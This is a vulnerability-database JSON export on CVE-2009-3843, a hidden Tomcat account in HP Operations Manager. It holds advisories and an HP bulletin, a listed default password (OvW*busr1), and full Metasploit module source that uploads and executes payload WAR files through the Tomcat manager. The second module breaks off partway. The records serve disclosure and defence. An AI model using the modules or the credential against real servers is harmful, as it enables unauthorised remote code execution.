HP Operations Manager 8.10 on Windows contains a "hidden account" in the XML file that specifies Tomcat users, which allows remote attackers to conduct unrestricted file upload attacks, and thereby execute arbitrary code, by using the org.apache.catalina.manager.HTMLManagerServlet class to make requests to manager/html/upload.
{"saint": [{"lastseen": "2016-10-03T15:01:54", "description": "Added: 06/18/2010 \nCVE: [CVE-2009-3843](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3843>) \nBID: [37086](<http://www.securityfocus.com/bid/37086>) \nOSVDB: [60317](<http://www.osvdb.org/60317>) \n\n\n### Background\n\n[HP Operations Manager](<https://h10078.www1.hp.com/cda/hpms/display/main/hpms_content.jsp?zn=bto&cp=1-11-15-28_4000_100__>) is a consolidated event and performance management console that correlates infrastructure, network and end-user experience events across an IT infrastructure. \n\n### Problem\n\nA hidden Apache Tomcat account allows remote attackers to use the org.apache.catalina.manager.HTMLManagerServlet class to upload arbitrary files, leading to arbitrary code execution. \n\n### Resolution\n\nApply the patch referenced in [HPSBMA02478 SSRT090251](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01931960>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-09-085/> \n\n\n### Limitations\n\nExploit works on HP Operations Manager A.08.10 on Windows Server 2003 and Windows Server 2008. 
\n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2010-06-18T00:00:00", "type": "saint", "title": "HP Operations Manager hidden Tomcat account", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-3843"], "modified": "2010-06-18T00:00:00", "id": "SAINT:5DF2E8BB0ECF29725510E3173971EDE5", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/hp_operations_manager_hidden_tomcat_account", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-07-28T14:33:32", "description": "Added: 06/18/2010 \nCVE: [CVE-2009-3843](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3843>) \nBID: [37086](<http://www.securityfocus.com/bid/37086>) \nOSVDB: [60317](<http://www.osvdb.org/60317>) \n\n\n### Background\n\n[HP Operations Manager](<https://h10078.www1.hp.com/cda/hpms/display/main/hpms_content.jsp?zn=bto&cp=1-11-15-28_4000_100__>) is a consolidated event and performance management console that correlates infrastructure, network and end-user experience events across an IT infrastructure. \n\n### Problem\n\nA hidden Apache Tomcat account allows remote attackers to use the org.apache.catalina.manager.HTMLManagerServlet class to upload arbitrary files, leading to arbitrary code execution. \n\n### Resolution\n\nApply the patch referenced in [HPSBMA02478 SSRT090251](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01931960>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-09-085/> \n\n\n### Limitations\n\nExploit works on HP Operations Manager A.08.10 on Windows Server 2003 and Windows Server 2008. 
\n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2010-06-18T00:00:00", "type": "saint", "title": "HP Operations Manager hidden Tomcat account", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3843"], "modified": "2010-06-18T00:00:00", "id": "SAINT:94DD62E7D4C2602EDF0704F85789EDD0", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/hp_operations_manager_hidden_tomcat_account", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-20T18:51:58", "description": "Added: 06/18/2010 \nCVE: [CVE-2009-3843](<https://vulners.com/cve/CVE-2009-3843>) \nBID: [37086](<http://www.securityfocus.com/bid/37086>) \nOSVDB: [60317](<http://www.osvdb.org/60317>) \n\n\n### Background\n\n[HP Operations Manager](<https://h10078.www1.hp.com/cda/hpms/display/main/hpms_content.jsp?zn=bto&cp=1-11-15-28_4000_100__>) is a consolidated event and performance management console that correlates infrastructure, network and end-user experience events across an IT infrastructure. \n\n### Problem\n\nA hidden Apache Tomcat account allows remote attackers to use the org.apache.catalina.manager.HTMLManagerServlet class to upload arbitrary files, leading to arbitrary code execution. \n\n### Resolution\n\nApply the patch referenced in [HPSBMA02478 SSRT090251](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01931960>). 
\n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-09-085/> \n\n\n### Limitations\n\nExploit works on HP Operations Manager A.08.10 on Windows Server 2003 and Windows Server 2008. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2010-06-18T00:00:00", "type": "saint", "title": "HP Operations Manager hidden Tomcat account", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3843"], "modified": "2010-06-18T00:00:00", "id": "SAINT:88789BF22A82B3B79355F9F1C375C644", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/hp_operations_manager_hidden_tomcat_account", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-03T16:51:43", "description": "Added: 06/18/2010 \nCVE: [CVE-2009-3843](<https://vulners.com/cve/CVE-2009-3843>) \nBID: [37086](<http://www.securityfocus.com/bid/37086>) \nOSVDB: [60317](<http://www.osvdb.org/60317>) \n\n\n### Background\n\n[HP Operations Manager](<https://h10078.www1.hp.com/cda/hpms/display/main/hpms_content.jsp?zn=bto&cp=1-11-15-28_4000_100__>) is a consolidated event and performance management console that correlates infrastructure, network and end-user experience events across an IT infrastructure. \n\n### Problem\n\nA hidden Apache Tomcat account allows remote attackers to use the org.apache.catalina.manager.HTMLManagerServlet class to upload arbitrary files, leading to arbitrary code execution. 
\n\n### Resolution\n\nApply the patch referenced in [HPSBMA02478 SSRT090251](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01931960>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-09-085/> \n\n\n### Limitations\n\nExploit works on HP Operations Manager A.08.10 on Windows Server 2003 and Windows Server 2008. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2010-06-18T00:00:00", "type": "saint", "title": "HP Operations Manager hidden Tomcat account", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3843"], "modified": "2010-06-18T00:00:00", "id": "SAINT:7CC6DA9BCE40E1A4453714BA7B40AFF7", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/hp_operations_manager_hidden_tomcat_account", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:32", "description": "ZDI-09-085: Hewlett-Packard Operations Manager Server Backdoor Account Code Execution Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-09-085\r\nNovember 20, 2009\r\n\r\n-- CVE ID:\r\nCVE-2009-3843\r\n\r\n-- Affected Vendors:\r\nHewlett-Packard\r\n\r\n-- Affected Products:\r\nHewlett-Packard OpenView Operations Manager for Windows\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 9261. 
\r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Hewlett-Packard Operations Manager.\r\nAuthentication is not required to exploit this vulnerability.\r\n\r\nThe specific flaw exists due to a hidden account present within the\r\nTomcat users XML file. Using this account a malicious user can access\r\nthe org.apache.catalina.manager.HTMLManagerServlet class. This is\r\ndefined within the catalina-manager.jar file installed with the product.\r\nThis servlet allows a remote user to upload a file via a POST request to\r\n/manager/html/upload. If an attacker uploads malicious content it can\r\nthen be accessed and executed on the server which leads to arbitrary\r\ncode execution under the context of the SYSTEM user.\r\n\r\n-- Vendor Response:\r\nHewlett-Packard has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01931960\r\n\r\n-- Disclosure Timeline:\r\n2009-11-09 - Vulnerability reported to vendor\r\n2009-11-20 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Stephen Fewer of Harmony Security (www.harmonysecurity.com)\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. 
Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n", "cvss3": {}, "published": "2009-11-23T00:00:00", "type": "securityvulns", "title": "ZDI-09-085: Hewlett-Packard Operations Manager Server Backdoor Account Code Execution Vulnerability", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2009-3843"], "modified": "2009-11-23T00:00:00", "id": "SECURITYVULNS:DOC:22821", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22821", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:32", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c01931960\r\nVersion: 1\r\n\r\nHPSBMA02478 SSRT090251 rev.1 - HP Operations Manager for Windows, Remote Unauthorized Access\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible.\r\n\r\nRelease Date: 2009-11-18\r\nLast Updated: 2009-11-18\r\n\r\nPotential Security Impact: Remote unauthorized access\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Operations Manager for Windows. 
The\r\nvulnerability could be exploited remotely to gain unauthorized access.\r\n\r\nReferences: CVE-2009-3843\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Operations Manager for Windows v8.10\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2009-3843 (AV:N/AC:L/Au:N/C:C/I:C/A:N) 9.4\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nThe Hewlett-Packard Company thanks Stephen Fewer of Harmony Security working with TippingPoint's\r\nZero Day initiative for reporting this vulnerability to security-alert@hp.com.\r\n\r\nRESOLUTION\r\n\r\nHP has made the following patch available to resolve the vulnerability. The patch is available for\r\ndownload from http://support.openview.hp.com/selfsolve/patches\r\n\r\nProduct\r\n Version\r\n Patch\r\n\r\nHP Operations Manager for Windows\r\n 8.10\r\n OMW_00032 or subsequent\r\n\r\nPRODUCT SPECIFIC INFORMATION\r\nNone\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 18 November 2009 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be installed on systems\r\nrunning HP software products should be applied in accordance with the customer's patch management\r\npolicy.\r\n\r\nSupport: For further information, contact normal HP Services support channel.\r\n\r\nReport: To report a potential security vulnerability with any HP supported product, send Email to:\r\nsecurity-alert@hp.com\r\nIt is strongly recommended that security related information being communicated to HP be encrypted\r\nusing PGP, especially exploit information.\r\nTo get the security-alert PGP key, please send an e-mail message as follows:\r\n To: security-alert@hp.com\r\n Subject: get key\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via 
Email:\r\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC\r\nOn the web page: ITRC security bulletins and patch sign-up\r\nUnder Step1: your ITRC security bulletins and patches\r\n -check ALL categories for which alerts are required and continue.\r\nUnder Step2: your ITRC operating systems\r\n -verify your operating system selections are checked and save.\r\n\r\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php\r\nLog in on the web page: Subscriber's choice for Business: sign-in.\r\nOn the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate\r\nsections.\r\n\r\nTo review previously published Security Bulletins visit:\r\nhttp://www.itrc.hp.com/service/cki/secBullArchive.do\r\n\r\n* The Software Product Category that this Security Bulletin\r\nrelates to is represented by the 5th and 6th characters\r\nof the Bulletin number in the title:\r\n\r\nGN = HP General SW\r\nMA = HP Management Agents\r\nMI = Misc. 3rd Party SW\r\nMP = HP MPE/iX\r\nNS = HP NonStop Servers\r\nOV = HP OpenVMS\r\nPI = HP Printing & Imaging\r\nST = HP Storage SW\r\nTL = HP Trusted Linux\r\nTU = HP Tru64 UNIX\r\nUX = HP-UX\r\nVV = HP VirtualVault\r\n\r\nSystem management and security procedures must be reviewed frequently to maintain system integrity.\r\nHP is continually reviewing and enhancing the security features of software products to provide\r\ncustomers with current secure solutions.\r\n\r\n"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of\r\nthe affected HP products the important security information contained in this Bulletin. HP recommends\r\nthat all users determine the applicability of this information to their individual situations and\r\ntake appropriate action. 
HP does not warrant that this information is necessarily accurate or\r\ncomplete for all user situations and, consequently, HP will not be responsible for any damages\r\nresulting from user's use or disregard of the information provided in this Bulletin. To the extent\r\npermitted by law, HP disclaims all warranties, either express or implied, including the warranties of\r\nmerchantability and fitness for a particular purpose, title and non-infringement."\r\n\r\nCopyright 2009 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained\r\nherein. The information provided is provided "as is" without warranty of any kind. To the extent\r\npermitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost profits;damages relating to\r\nthe procurement of substitute products or services; or damages for loss of data, or software\r\nrestoration. The information in this document is subject to change without notice. Hewlett-Packard\r\nCompany and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard\r\nCompany in the United States and other countries. 
Other product and company names mentioned herein\r\nmay be trademarks of their respective owners.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niEYEARECAAYFAksERwAACgkQ4B86/C0qfVnibACgmYvkL5wCSUtU9mVpWPSwQWAY\r\nlx8AoL0P1iOjGRgCdvWxEnlNM9tKr71j\r\n=p9gT\r\n-----END PGP SIGNATURE-----", "cvss3": {}, "published": "2009-11-20T00:00:00", "type": "securityvulns", "title": "[security bulletin] HPSBMA02478 SSRT090251 rev.1 - HP Operations Manager for Windows, Remote Unauthorized Access", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2009-3843"], "modified": "2009-11-20T00:00:00", "id": "SECURITYVULNS:DOC:22818", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22818", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:58:45", "description": "There is a hidden undocumented Tomcat account.", "cvss3": {}, "published": "2009-11-23T00:00:00", "type": "securityvulns", "title": "HP Operations Manager backdoor account", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2009-3843"], "modified": "2009-11-23T00:00:00", "id": "SECURITYVULNS:VULN:10414", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10414", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "attackerkb": [{"lastseen": "2023-10-18T11:32:52", "description": "HP Operations Manager 8.10 on Windows contains a \u201chidden account\u201d in the XML file that specifies Tomcat users, which allows remote attackers to conduct unrestricted file upload attacks, and thereby execute arbitrary code, by using the org.apache.catalina.manager.HTMLManagerServlet class to make requests to manager/html/upload.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {}, "published": 
"2009-11-24T00:00:00", "type": "attackerkb", "title": "CVE-2009-3843", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3843"], "modified": "2023-10-04T00:00:00", "id": "AKB:7AD2ABEF-642C-4C50-B84F-BB1FCBC66D8B", "href": "https://attackerkb.com/topics/JXxzdmi7fH/cve-2009-3843", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "prion": [{"lastseen": "2023-11-22T05:09:02", "description": "HP Operations Manager 8.10 on Windows contains a \"hidden account\" in the XML file that specifies Tomcat users, which allows remote attackers to conduct unrestricted file upload attacks, and thereby execute arbitrary code, by using the org.apache.catalina.manager.HTMLManagerServlet class to make requests to manager/html/upload.", "cvss3": {}, "published": "2009-11-24T00:30:00", "type": "prion", "title": "Unrestricted file upload", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3843"], "modified": "2017-08-17T01:31:00", "id": "PRION:CVE-2009-3843", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2009-3843", "cvss": 
{"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-22T05:09:38", "description": "HP Operations Manager has a default password of OvW*busr1 for the ovwebusr account, which allows remote attackers to execute arbitrary code via a session that uses the manager role to conduct unrestricted file upload attacks against the /manager servlet in the Tomcat servlet container. NOTE: this might overlap CVE-2009-3099 and CVE-2009-3843.", "cvss3": {}, "published": "2009-12-03T17:30:00", "type": "prion", "title": "Unrestricted file upload", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3099", "CVE-2009-3843", "CVE-2009-4189"], "modified": "2009-12-04T05:00:00", "id": "PRION:CVE-2009-4189", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2009-4189", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:17:34", "description": "", "cvss3": {}, "published": "2010-02-19T00:00:00", "type": "packetstorm", "title": "Apache Tomcat Manager Application Deployer Upload and Execute", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-3843"], "modified": "2010-02-19T00:00:00", "id": "PACKETSTORM:86448", "href": "https://packetstormsecurity.com/files/86448/Apache-Tomcat-Manager-Application-Deployer-Upload-and-Execute.html", "sourceData": "`## \n# $Id: tomcat_mgr_deploy.rb 8552 2010-02-18 18:18:43Z jduck $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and 
commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Tomcat Manager Application Deployer Upload and Execute', \n'Description' => %q{ \nThis module can be used to execute a payload on Apache Tomcat servers that \nhave an exposed \"manager\" application. The payload is uploaded as a WAR archive \ncontaining a jsp application using a PUT request. \n \nThe manager application can also be abused using /manager/html/upload, but that \nmethod is not implemented in this module. \n}, \n'Author' => [ 'jduck' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 8552 $', \n'References' => \n[ \n# There is no single vulnerability associated with deployment functionality. \n# Instead, the focus has been on insecure/blank/hardcoded default passwords. 
\n \n# The following references refer to HP Operations Manager \n[ 'CVE', '2009-3843' ], \n[ 'OSVDB', '60317' ], \n \n# tomcat docs \n[ 'URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html' ] \n], \n'Platform' => [ 'win' ], \n'Targets' => \n[ \n[ 'Automatic', { } ], \n], \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('PATH', [ true, \"The URI path of the manager app (/deploy and /undeploy will be used)\", '/manager']) \n], self.class) \nend \n \n \ndef exploit \n \n# TODO: autodetect arch/platform from /manager/serverinfo and/or db notes \narch = ARCH_X86 \nplat = [Msf::Module::Platform::Windows] \n \n# Generate the WAR containing the EXE containing the payload \njsp_name = rand_text_alphanumeric(4+rand(32-4)) \nwar = Msf::Util::EXE.to_jsp_war(framework, \narch, plat, \npayload.encoded, \n:jsp_name => jsp_name) \n \napp_base = rand_text_alphanumeric(4+rand(32-4)) \napp_name = app_base + \".war\" \nquery_str = \"?path=/\" + app_base \n \n# \n# UPLOAD \n# \npath_tmp = datastore['PATH'] + \"/deploy\" + query_str \nprint_status(\"Uploading #{war.length} bytes as #{app_name}...\") \nres = send_request_cgi({ \n'uri' => path_tmp, \n'method' => 'PUT', \n'ctype' => 'application/octet-stream', \n'data' => war, \n}, 20) \nif (! res) \nraise RuntimeError, \"Upload failed on #{path_tmp} [No Response]\" \nend \nif (res.code < 200 or res.code >= 300) \ncase res.code \nwhen 401 \nprint_error(\"Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}\") \nend \nraise RuntimeError, \"Upload failed on #{path_tmp} [#{res.code} #{res.message}]\" \nend \n \n \n# \n# EXECUTE \n# \nprint_status(\"Executing #{app_base}...\") \nres = send_request_cgi({ \n'uri' => '/' + app_base + '/' + jsp_name + '.jsp', \n'method' => 'GET' \n}, 20) \n \nif (! 
res) \nprint_error(\"Execution failed on #{app_base} [No Response]\") \nelsif (res.code < 200 or res.code >= 300) \nprint_error(\"Execution failed on #{app_base} [#{res.code} #{res.message}]\") \nend \n \n \n# \n# DELETE \n# \npath_tmp = datastore['PATH'] + \"/undeploy\" + query_str \nprint_status(\"Undeploying #{app_base} ...\") \nres = send_request_cgi({ \n'uri' => path_tmp, \n'method' => 'GET' \n}, 20) \nif (! res) \nprint_error(\"WARNING: Undeployment failed on #{path_tmp} [No Response]\") \nelsif (res.code < 200 or res.code >= 300) \nprint_error(\"Deletion failed on #{path_tmp} [#{res.code} #{res.message}]\") \nend \n \nhandler \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/86448/tomcat_mgr_deploy.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:16:08", "description": "", "cvss3": {}, "published": "2014-02-01T00:00:00", "type": "packetstorm", "title": "Apache Tomcat Manager Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-4188", "CVE-2010-4094", "CVE-2009-3843", "CVE-2010-0557", "CVE-2009-4189", "CVE-2009-3548"], "modified": "2014-02-01T00:00:00", "id": "PACKETSTORM:125021", "href": "https://packetstormsecurity.com/files/125021/Apache-Tomcat-Manager-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nHttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] } \n \nCSRF_VAR = 'CSRF_NONCE=' \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Tomcat Manager Application Upload Authenticated Code Execution', \n'Description' => %q{ \nThis module can be used to execute a payload on Apache Tomcat 
servers that \nhave an exposed \"manager\" application. The payload is uploaded as a WAR archive \ncontaining a jsp application using a POST request against the /manager/html/upload \ncomponent. \n \nNOTE: The compatible payload sets vary based on the selected target. For \nexample, you must select the Windows target to use native Windows payloads. \n}, \n'Author' => 'rangercha', \n'License' => MSF_LICENSE, \n'References' => \n[ \n# This is based on jduck's tomcat_mgr_deploy. \n# the tomcat_mgr_deploy no longer works for current versions of tomcat due to \n# CSRF protection tokens. Also PUT requests against the /manager/html/deploy \n# aren't allowed anymore. \n \n# There is no single vulnerability associated with deployment functionality. \n# Instead, the focus has been on insecure/blank/hardcoded default passwords. \n \n# The following references refer to HP Operations Manager \n['CVE', '2009-3843'], \n['OSVDB', '60317'], \n['CVE', '2009-4189'], \n['OSVDB', '60670'], \n \n# HP Operations Dashboard \n['CVE', '2009-4188'], \n \n# IBM Cognos Express Default user/pass \n['BID', '38084'], \n['CVE', '2010-0557'], \n['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21419179'], \n \n# IBM Rational Quality Manager and Test Lab Manager \n['CVE', '2010-4094'], \n['ZDI', '10-214'], \n \n# 'admin' password is blank in default Windows installer \n['CVE', '2009-3548'], \n['OSVDB', '60176'], \n['BID', '36954'], \n \n# tomcat docs \n['URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html'] \n], \n'Platform' => %w{ java linux win }, # others? 
\n'Targets' => \n[ \n[ 'Java Universal', \n{ \n'Arch' => ARCH_JAVA, \n'Platform' => 'java' \n} \n], \n# \n# Platform specific targets only \n# \n[ 'Windows Universal', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'win' \n} \n], \n[ 'Linux x86', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'linux' \n} \n] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Nov 09 2009')) \n \nregister_options( \n[ \nOptString.new('USERNAME', [false, 'The username to authenticate as']), \nOptString.new('PASSWORD', [false, 'The password for the specified username']), \n# /cognos_express/manager/ for Cognos Express (19300) \nOptString.new('TARGETURI', [true, \"The URI path of the manager app (/html/upload and /undeploy will be used)\", '/manager']) \n], self.class) \nend \n \ndef check \nres = query_manager \ndisconnect \n \nreturn CheckCode::Unknown if res.nil? \n \nif res.code.between?(400, 499) \nvprint_error(\"#{peer} - Server rejected the credentials\") \nreturn CheckCode::Unknown \nend \n \nreturn CheckCode::Safe unless res.code == 200 \n \n# if res.code == 200 \n# there should be access to the Tomcat Manager and to the status page \nres = query_status \nreturn CheckCode::Unknown unless res \n \nplat = detect_platform(res.body) \narch = detect_arch(res.body) \nreturn CheckCode::Unknown unless plat and arch \n \nvprint_status(\"#{peer} - Tomcat 